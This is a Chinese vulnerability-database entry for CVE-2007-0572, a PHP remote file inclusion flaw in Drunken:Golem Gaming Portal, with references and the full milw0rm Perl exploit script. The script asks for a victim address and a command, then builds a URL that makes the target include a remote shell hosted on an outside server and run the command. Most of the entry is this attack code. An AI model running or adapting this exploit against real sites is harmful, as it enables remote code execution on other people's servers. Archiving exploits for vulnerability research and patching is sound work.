Drunken:Golem Gaming Portal 'phpIRC.php' 版本PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112103 漏洞类型 未知
发布时间 2007-01-27 更新时间 2007-01-30
CVE编号 CVE-2007-0572 CNNVD-ID CNNVD-200701-527
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3207
https://www.securityfocus.com/bid/86643
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-527
|漏洞详情
Drunken:GolemGamingPortal0.5.1Alpha2版本及其早期版本的include/irc/phpIRC.php中存在PHP远程文件包含漏洞。远程攻击者可以借助对phpbb_root_path参数的一个URL,执行任意PHP代码。
|漏洞EXP
#(C) MackRulZ - 2007
#
# [Bug name: Drunken:Golem Gaming Portal (root_path) Remote File Include Exploit
#
# [Script Name: Xero Portal v1.2
#
# [Wrong Codes:  require($phpbb_root_path . 'includes/bbcode.'.$phpEx);
#
$rfi = "phpIRC.php?root_path="; 
$path = "/include/irc/";
$shell = "http://pang0.by.ru/shall/pang057.zz?cmd=";
print "Language: English // Turkish\nPlz Select Lang:\n"; $dil = <STDIN>; chop($dil);
if($dil eq "English"){
print "(c) Mackrulz\n";
&ex;
}
elsif($dil eq "Turkish"){
print "Kodlayan MackruLz\n";
&ex;
}
else {print "Plz Select Languge\n"; exit;}
sub ex{
$not = "Victim is Not Vunl.\n" and $not_cmd = "Victim is Vunl but Not doing Exec.\n"
and $vic = "Victim Addres? with start http:// :" and $thx = "Greetz " and $diz = "Dictionary?:" and $komt = "Command?:"
if $dil eq "English";
$not = "Adreste RFI acigi Yok\n" and $not_cmd = "Adresde Ac.k Var Fakat Kod Calismiyor\n"
and $vic = "Ornek Adres http:// ile baslayan:" and $diz = "Dizin?: " and $thx = "Tesekkurler " and $komt = "Command?:"
if $dil eq "Turkish";
print "$vic";
$victim = <STDIN>;
chop($victim);
print "$diz";
$dizn = <STDIN>;
chop($dizn);
$dizin = $dizn;
$dizin = "/" if !$dizn;
print "$komt";
$cmd = <STDIN>;
chop($cmd);
$cmmd = $cmd;
$cmmd = "dir" if !$cmd;
$site = $victim;
$site = "http://$victim" if !($victim =~ /http/);
$acacaz = "$site$dizin$rfi$shell$cmmd";
print "(c) Mackrulz\n$thx: xoron\n";
sleep 3;
system("start $acacaz");
}

# milw0rm.com [2007-01-27]
|受影响的产品
Drunken Golem Gaming Portal 0.5.1 Alpha 2
|参考资料

来源:MILW0RM
名称:3207
链接:http://www.milw0rm.com/exploits/3207
来源:VUPEN
名称:ADV-2007-0390
链接:http://www.frsirt.com/english/advisories/2007/0390
来源:OSVDB
名称:36619
链接:http://osvdb.org/36619
来源:XF
名称:drunkengolem-phpirc-file-include(31873)
链接:http://xforce.iss.net/xforce/xfdb/31873
来源:MILW0RM
名称:3207
链接:http://milw0rm.com/exploits/3207